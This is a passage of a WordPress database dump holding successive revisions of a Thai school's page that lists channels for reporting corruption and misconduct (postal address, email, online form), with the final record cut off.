(1531,1,'2025-07-01 12:07:02','2025-07-01 05:07:02','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\">ช่องทางแจ้งเรื่องร้องเรียนอื่น ได้ที่</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"layout\":\"vtabs\",\"currentTab\":3,\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-3 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-01 12:07:02','2025-07-01 05:07:02','',476,'http://pakhaeng.ssk.in.th/?p=1531',0,'revision','',0),
(1533,1,'2025-07-01 12:11:58','2025-07-01 05:11:58','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\">ช่องทางแจ้งเรื่องร้องเรียนอื่น ได้ที่</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"layout\":\"vtabs\",\"minHeight\":114,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-01 12:11:58','2025-07-01 05:11:58','',476,'http://pakhaeng.ssk.in.th/?p=1533',0,'revision','',0),
(1534,1,'2025-07-01 12:12:15','2025-07-01 05:12:15','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\">ช่องทางแจ้งเรื่องร้องเรียนอื่น ได้ที่</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"layout\":\"vtabs\",\"minHeight\":114,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-01 12:12:15','2025-07-01 05:12:15','',476,'http://pakhaeng.ssk.in.th/?p=1534',0,'revision','',0),
(1536,1,'2025-07-01 12:13:02','2025-07-01 05:13:02','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"layout\":\"vtabs\",\"minHeight\":114,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"\",\"iconSide\":\"right\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\"} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-right kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-01 12:13:02','2025-07-01 05:13:02','',476,'http://pakhaeng.ssk.in.th/?p=1536',0,'revision','',0),
(1538,1,'2025-07-01 12:16:02','2025-07-01 05:16:02','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"layout\":\"vtabs\",\"minHeight\":31,\"maxWidth\":974,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"fe_user\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"fe_mail\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"fe_globe\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\",\"verticalTabWidth\":[16,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_user\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_mail\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span data-name=\"fe_globe\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph -->','ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ','','inherit','closed','closed','','476-revision-v1','','','2025-07-01 12:16:02','2025-07-01 05:16:02','',476,'http://pakhaeng.ssk.in.th/?p=1538',0,'revision','',0),
(1539,1,'2025-07-01 12:46:21','2025-07-01 05:46:21','<!-- wp:image {\"id\":1513,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353-1.png\" alt=\"\" class=\"wp-image-1513\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"af28c81c\",\"blockVersion\":3} -->\n<h2 class=\"gb-headline gb-headline-af28c81c gb-headline-text\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:kadence/tabs {\"uniqueID\":\"476_934328-1a\",\"layout\":\"vtabs\",\"minHeight\":31,\"maxWidth\":974,\"contentBgColor\":\"#fcb900\",\"contentBorderStyles\":[{\"top\":[\"#cf2e2e\",\"\",3],\"right\":[\"#cf2e2e\",\"\",3],\"bottom\":[\"#cf2e2e\",\"\",3],\"left\":[\"#cf2e2e\",\"\",3],\"unit\":\"px\"}],\"contentBorderRadius\":[5,5,5,5],\"titles\":[{\"text\":\"ไปรษณีย์\",\"icon\":\"fe_user\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"E-mail.\",\"icon\":\"fe_mail\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"ออนไลน์\",\"icon\":\"fe_globe\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#ff6900\",\"titleColorHover\":\"#ffffff\",\"titleColorActive\":\"#ffffff\",\"titleBg\":\"#8ed1fc\",\"titleBgHover\":\"#fcb900\",\"titleBgActive\":\"#fcb900\",\"titleBorder\":\"#0693e3\",\"size\":\"md\",\"lineHeight\":10,\"tabSize\":\"\",\"tabLineHeight\":\"\",\"mobileSize\":\"\",\"mobileLineHeight\":\"\",\"fontWeight\":\"400\",\"textTransform\":\"capitalize\",\"verticalTabWidth\":[16,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id476_934328-1a kt-tabs-has-3-tabs kt-active-tab-1 kt-tabs-layout-vtabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-left \"><ul class=\"kt-tabs-title-list\"><li id=\"tab-\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_user\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ไปรษณีย์</span></a></li><li id=\"tab-e-mail\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-mail\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_mail\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-mail.</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-3 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"3\" class=\"kt-tab-title kt-tab-title-3 \"><span data-name=\"fe_globe\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">ออนไลน์</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"687785-10\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab687785-10\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>ที่ตั้ง 94 หมู่ที่ 6 ตำบลโพธิ์  อำเภอโนนคูณ จังหวัดศรีสะเกษ  33250</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"a205fc-91\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-taba205fc-91\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:list -->\n<ul class=\"wp-block-list\"><!-- wp:list-item -->\n<li>33010169@sisaketedu1.go.th</li>\n<!-- /wp:list-item --></ul>\n<!-- /wp:list --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":3,\"uniqueID\":\"5484db-9d\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-3 kt-inner-tab5484db-9d\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:shortcode -->\n[forminator_form id=\"1416\"]\n<!-- /wp:shortcode --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph {\"fontSize\":\"medium\"} -->\n<p class=\"has-medium-font-size\"></p>\n<!-- /wp:paragraph 